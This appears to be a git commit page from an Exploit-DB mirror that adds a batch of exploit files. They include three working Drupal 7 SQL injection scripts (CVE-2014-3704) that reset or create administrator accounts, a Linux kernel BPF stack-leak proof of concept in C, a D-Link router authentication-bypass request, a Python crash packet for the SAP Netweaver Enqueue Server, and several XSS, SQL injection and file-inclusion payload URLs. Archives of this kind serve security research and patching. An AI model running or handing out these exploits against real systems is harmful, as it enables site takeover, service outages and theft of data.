bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 10_19_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-19 04:45:00 +00:00
parent 63aa7610b4
commit 1d0bcd6fa4
17 changed files with 841 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -31499,3 +31499,19 @@ id,file,description,date,author,platform,type,port
34980,platforms/novell/dos/34980.py,"Novell GroupWise 8.0 Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0
34981,platforms/ios/webapps/34981.txt,"Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities",2014-10-15,Vulnerability-Lab,ios,webapps,0
34982,platforms/win32/local/34982.rb,"Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation",2014-10-15,metasploit,win32,local,0
34984,platforms/php/webapps/34984.py,"Drupal Core <= 7.32 - SQL Injection (#1)",2014-10-16,fyukyuk,php,webapps,0
34985,platforms/php/remote/34985.txt,"pfSense 2 Beta 4 'graph.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-05,"dave b",php,remote,0
34986,platforms/hardware/remote/34986.txt,"D-Link DIR-300 Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",hardware,remote,0
34987,platforms/linux/local/34987.c,"Linux Kernel 2.6.x 'net/core/filter.c' Local Information Disclosure Vulnerability",2010-11-09,"Dan Rosenberg",linux,local,0
34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE 'name_new' Parameter Cross Site Scripting Vulnerability",2010-11-10,MustLive,php,webapps,0
34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0
34990,platforms/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 Cross Site Scripting Vulnerability",2010-11-09,thelightcosine,php,webapps,0
34992,platforms/php/webapps/34992.txt,"Drupal Core <= 7.32 - SQL Injection (#2)",2014-10-17,"Claudio Viviani",php,webapps,0
34993,platforms/php/webapps/34993.php,"Drupal Core <= 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0
34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 Multiple Cross Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0
34995,platforms/php/webapps/34995.txt,"Simea CMS 'index.php' SQL Injection Vulnerability",2010-11-16,Cru3l.b0y,php,webapps,0
34996,platforms/php/webapps/34996.txt,"Raised Eyebrow CMS 'venue.php' SQL Injection Vulnerability",2010-11-16,Cru3l.b0y,php,webapps,0
34997,platforms/windows/remote/34997.txt,"DServe Multiple Cross Site Scripting Vulnerabilities",2010-11-16,Axiell,windows,remote,0
34998,platforms/linux/remote/34998.txt,"Eclipse <= 3.6.1 Help Server help/index.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0
34999,platforms/linux/remote/34999.txt,"Eclipse <= 3.6.1 Help Server help/advanced/content.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0
35000,platforms/windows/dos/35000.txt,"SAP Netweaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200

Can't render this file because it is too large.

13
platforms/cgi/webapps/34994.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/44843/info
OpenWrt is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
OpenWrt 10.03 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/cgi-bin/luci/;stok=d/admin/network/network/"/><script>alert(1);</script>
http://www.example.com/cgi-bin/luci/;stok=d/admin/system/packages?query=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&submit=OK

18
platforms/hardware/remote/34986.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/44743/info
The D-Link DIR-300 wireless router is prone to multiple security-bypass vulnerabilities.
Remote attackers can exploit these issues to bypass security restrictions, access certain administrative functions, alter configuration, and compromise the affected device.
D-Link DIR-300 running firmware 2.01B1, 1.04, 1.05 are vulnerable. Additional models and firmware versions may also be affected.
POST http://www.example.com:80/tools_admin.php HTTP/1.1
Host: www.example.com
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0
ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
http://www.example.com/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0

137
platforms/linux/local/34987.c Executable file
View file

@ -0,0 +1,137 @@
source: http://www.securityfocus.com/bid/44758/info
The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
/*
* You've done it. After hours of gdb and caffeine, you've finally got a shell
* on your target's server. Maybe next time they will think twice about
* running MyFirstCompSciProjectFTPD on a production machine. As you take
* another sip of Mountain Dew and pick some of the cheetos out of your beard,
* you begin to plan your next move - it's time to tackle the kernel.
*
* What should be your goal? Privilege escalation? That's impossible, there's
* no such thing as a privilege escalation vulnerability on Linux. Denial of
* service? What are you, some kind of script kiddie? No, the answer is
* obvious. You must read the uninitialized bytes of the kernel stack, since
* these bytes contain all the secrets of the universe and the meaning of life.
*
* How can you accomplish this insidious feat? You immediately discard the
* notion of looking for uninitialized struct members that are copied back to
* userspace, since you clearly need something far more elite. In order to
* prove your superiority, your exploit must be as sophisticated as your taste
* in obscure electronic music. After scanning the kernel source for good
* candidates, you find your target and begin to code...
*
* by Dan Rosenberg
*
* Greets to kees, taviso, jono, spender, hawkes, and bla
*
*/
#include <string.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <linux/filter.h>
#define PORT 37337
int transfer(int sendsock, int recvsock)
{
struct sockaddr_in addr;
char buf[512];
int len = sizeof(addr);
memset(buf, 0, sizeof(buf));
if (fork())
return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);
sleep(1);
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
exit(0);
}
int main(int argc, char * argv[])
{
int sendsock, recvsock, ret;
unsigned int val;
struct sockaddr_in addr;
struct sock_fprog fprog;
struct sock_filter filters[5];
if (argc != 2) {
printf("[*] Usage: %s offset (0-63)\n", argv[0]);
return -1;
}
val = atoi(argv[1]);
if (val > 63) {
printf("[*] Invalid byte offset (must be 0-63)\n");
return -1;
}
recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (recvsock < 0 || sendsock < 0) {
printf("[*] Could not create sockets.\n");
return -1;
}
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[*] Could not bind socket.\n");
return -1;
}
memset(&fprog, 0, sizeof(fprog));
memset(filters, 0, sizeof(filters));
filters[0].code = BPF_LD|BPF_MEM;
filters[0].k = (val & ~0x3) / 4;
filters[1].code = BPF_ALU|BPF_AND|BPF_K;
filters[1].k = 0xff << ((val % 4) * 8);
filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
filters[2].k = (val % 4) * 8;
filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
filters[3].k = 256;
filters[4].code = BPF_RET|BPF_A;
fprog.len = 5;
fprog.filter = filters;
if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
printf("[*] Failed to install filter.\n");
return -1;
}
ret = transfer(sendsock, recvsock);
printf("[*] Your byte: 0x%.02x\n", ret - 248);
}

7
platforms/linux/remote/34998.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44883/info
Eclipse IDE Help component is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://localhost:[REPLACE]/help/index.jsp?'onload='alert(0)

7
platforms/linux/remote/34999.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44883/info
Eclipse IDE Help component is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://localhost:[REPLACE]/help/advanced/content.jsp?'onload='alert(0)

10
platforms/php/remote/34985.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/44738/info
pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
pfSense 1.2.3 is vulnerable; other versions may also be affected.
http://www.example.com/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname=
http://www.example.com/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

20
platforms/php/webapps/34984.py Executable file
View file

@ -0,0 +1,20 @@
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
print "host username password"
print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
+user \
+"'+,+pass+%3d+'" \
+hash[:55] \
+"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

9
platforms/php/webapps/34988.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44763/info
PHPShop is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHPShop 2.1 EE is vulnerable; other versions may also be affected.
http://www.example.com/uploads/2010/PHPShop%20XSS.html

12
platforms/php/webapps/34989.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/44765/info
WeBid is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include a local file-include vulnerability and a cross-site-scripting vulnerability.
Exploiting these issues can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
WeBid 0.85P1 is vulnerable; other versions may be affected.
http://www.example.com/webid/active_auctions.php?lan=../../../../../../../../windows/win.ini%00
http://www.example.com/webid/confirm.php?id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/34990.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44772/info
Ricoh web image monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Ricoh web image monitor 2.03 is vulnerable; other versions may also be affected.
GET /?--></script><script>alert(51494)</script> HTTP/1.1

257
platforms/php/webapps/34992.txt Executable file
View file

@ -0,0 +1,257 @@
#!/usr/bin/python
#
#
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational
# purposes only and the author can not be held liable for
# any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
import hashlib, urllib2, optparse, random, sys
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.
class DrupalHash:
def __init__(self, stored_hash, password):
self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
self.last_hash = self.rehash(stored_hash, password)
def get_hash(self):
return self.last_hash
def password_get_count_log2(self, setting):
return self.itoa64.index(setting[3])
def password_crypt(self, algo, password, setting):
setting = setting[0:12]
if setting[0] != '$' or setting[2] != '$':
return False
count_log2 = self.password_get_count_log2(setting)
salt = setting[4:12]
if len(salt) < 8:
return False
count = 1 << count_log2
if algo == 'md5':
hash_func = hashlib.md5
elif algo == 'sha512':
hash_func = hashlib.sha512
else:
return False
hash_str = hash_func(salt + password).digest()
for c in range(count):
hash_str = hash_func(hash_str + password).digest()
output = setting + self.custom64(hash_str)
return output
def custom64(self, string, count = 0):
if count == 0:
count = len(string)
output = ''
i = 0
itoa64 = self.itoa64
while 1:
value = ord(string[i])
i += 1
output += itoa64[value & 0x3f]
if i < count:
value |= ord(string[i]) << 8
output += itoa64[(value >> 6) & 0x3f]
if i >= count:
break
i += 1
if i < count:
value |= ord(string[i]) << 16
output += itoa64[(value >> 12) & 0x3f]
if i >= count:
break
i += 1
output += itoa64[(value >> 18) & 0x3f]
if i >= count:
break
return output
def rehash(self, stored_hash, password):
# Drupal 6 compatibility
if len(stored_hash) == 32 and stored_hash.find('$') == -1:
return hashlib.md5(password).hexdigest()
# Drupal 7
if stored_hash[0:2] == 'U$':
stored_hash = stored_hash[1:]
password = hashlib.md5(password).hexdigest()
hash_type = stored_hash[0:3]
if hash_type == '$S$':
hash_str = self.password_crypt('sha512', password, stored_hash)
elif hash_type == '$H$' or hash_type == '$P$':
hash_str = self.password_crypt('md5', password, stored_hash)
else:
hash_str = False
return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
def randomAgentGen():
userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
UA = random.choice(userAgent)
return UA
def urldrupal(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
# Page login
url = url+'/?q=node&destination=node'
return url
banner = """
______ __ _______ _______ _____
| _ \ .----.--.--.-----.---.-| | | _ || _ | _ |
|. | \| _| | | _ | _ | | |___| _|___| |.| |
|. | |__| |_____| __|___._|__| / |___(__ `-|. |
|: 1 / |__| | | |: 1 | |: |
|::.. . / | | |::.. . | |::.|
`------' `---' `-------' `---'
_______ __ ___ __ __ __
| _ .-----| | | .-----|__.-----.----| |_|__.-----.-----.
| 1___| _ | | |. | | | -__| __| _| | _ | |
|____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__|
|: 1 | |__| |: | |___|
|::.. . | |::.|
`-------' `---'
Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
Admin 4cc0unt cr3at0r
Discovered by:
Stefan Horst
(CVE-2014-3704)
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
commandList.add_option('-t', '--target',
action="store",
help="Insert URL: http[s]://www.victim.com",
)
commandList.add_option('-u', '--username',
action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd',
action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.username or not options.pwd:
print(banner)
print
commandList.print_help()
sys.exit(1)
print(banner)
host = options.target
user = options.username
password = options.pwd
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = urldrupal(host)
# Add new user:
# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users
#
# Set administrator permission (rid = 3):
# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
#
post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
UA = randomAgentGen()
try:
req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
content = urllib2.urlopen(req).read()
if "mb_strlen() expects parameter 1" in content:
print "[!] VULNERABLE!"
print
print "[!] Administrator user created!"
print
print "[*] Login: "+str(user)
print "[*] Pass: "+str(password)
print "[*] Url: "+str(target)
else:
print "[X] NOT Vulnerable :("
except urllib2.HTTPError as e:
print "[X] HTTP Error: "+str(e.reason)+" ("+str(e.code)+")"
except urllib2.URLError as e:
print "[X] Connection error: "+str(e.reason)

29
platforms/php/webapps/34993.php Executable file
View file

@ -0,0 +1,29 @@
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection #
# Date: Oct 16 2014 #
# Exploit Author: Dustin Dörr #
# Software Link: http://www.drupal.com/ #
# Version: Drupal core 7.x versions prior to 7.32 #
# CVE: CVE-2014-3704 #
#-----------------------------------------------------------------------------#
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>

7
platforms/php/webapps/34995.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44878/info
Simea CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/path/index.php?product=-1+union+select+1,2,concat(version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

7
platforms/php/webapps/34996.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44880/info
Raised Eyebrow CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/path/venue.php?id=-1+union+select+1,2,3,4,5

276
platforms/windows/dos/35000.txt Executable file
View file

@ -0,0 +1,276 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
1. **Advisory Information**
Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service
Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL:
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release
2. **Vulnerability Information***
*
Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995
3. **Vulnerability Description**
SAP Netweaver [1] is a technology platform for building and
integrating SAP business
applications. A vulnerability has been found in SAP Netweaver
that could allow an
unauthenticated, remote attacker to create denial of service
conditions. The vulnerability
is triggered by sending a specially crafted SAP Enqueue Server
packet to remote TCP port 32NN
(NN being the SAP system number) of a host running the
"Standalone Enqueue Server" service, part
of SAP Netweaver Application Server ABAP/Java. The "Standalone
Enqueue Server" is a critical
component of a SAP Netweaver installation in terms of
availability, rendering the whole SAP
system unresponsive.
4. **Vulnerable Packages**
. SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
. SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).
Other versions are probably affected too, but they were not checked.
5. **Vendor Information, Solutions and Workarounds**
Martin Gallo proposed the following actions to mitigate the
impact of the vulnerabilities:
Restrict access to the Standalone Enqueue service by configuring
Access Control Lists [4] and to
the Standalone Enqueue Service TCP port 32XX (XX is the instance
number).
SAP published a security note [3] with the fix.
6. **Credits**
This vulnerability was discovered and researched by Martin Gallo
from Core Security Consulting
Services. The publication of this advisory was coordinated by
Joaquín Rodríguez Varela from Core
Advisories Team.
7. **Technical Description / Proof of Concept Code**
When the trace level of the service is configured to stop logging
when a pattern is found [2], the
service does not properly control the amount of recursion
resulting in a stack overflow exception.
The vulnerability can be triggered remotely by setting the trace
level with a wildcard Trace Pattern.
This vulnerability could allow a remote, unauthenticated attacker
to conduct a denial of service
attack against the vulnerable systems, rendering the Enqueue
Server unavailable.
The following python code can be used to trigger the vulnerability:
7.1. **Proof of Concept**
/-----
import socket, struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()
def send_packet(sock, packet):
packet = struct.pack("!I", len(packet)) + packet
sock.send(packet)
# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
print "[*] Sending crash packet"
crash = '\xab\xcd\xe1\x23' # Magic bytes
crash+= '\x00\x00\x00\x00' # Id
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b' # Packet/frag length
crash+= '\x03\x00\x00\x00' # Destination/Opcode/MoreFrags/Type
crash+= 'ENC\x00' # Admin Eye-catcher
crash+= '\x01\x00\x00\x00' # Version
crash+= '#EAA' # Admin Eye-catcher
crash+= '\x01\x00\x00\x00\x00' # Len
crash+= '\x06\x00\x00\x00\x00\x00' # Opcode/Flags/RC
crash+= '#EAE' # Admin Eye-catcher
crash+= '\x01\x04\x00\x00' # Version/Action/Limit/Tread
crash+= '\x00\x00\x00\x00'
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03' # Trace Level
crash+= '\x01' # Logging
crash+= '\x01\x40\x00\x00' # Max file size
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01' # No. patterns
crash+= '\x00\x00\x00\x25#EAH' # Trace Eye-catcher
crash+= '\x01*\x00' # Trace Pattern
crash+= '#EAD' # Trace Eye-catcher
send_packet(connection, crash)
print "[*] Crash sent !"
-----/
8. **Report Timeline**
. 2014-06-02:
Initial notification sent to SAP, including technical
description to reproduce the
vulnerability. Publication date set to Jun 30, 2014.
. 2014-06-03:
Vendor notifies that the tracking number 1153917-2014 was
created for this issue.
. 2014-06-26:
Core Security requests SAP to inform the status of the advisory.
. 2014-06-30:
The vendor informs they were not able to reproduce the issue and
they request additional
details and a proof of concept.
. 2014-06-30:
Core Security sends SAP a full description of the vulnerability
including a python script
to trigger it.
. 2014-07-11:
Core Security asks if the vendor was able to trigger the
vulnerability. Additinally we
requested to set a publication date for the advisory based on
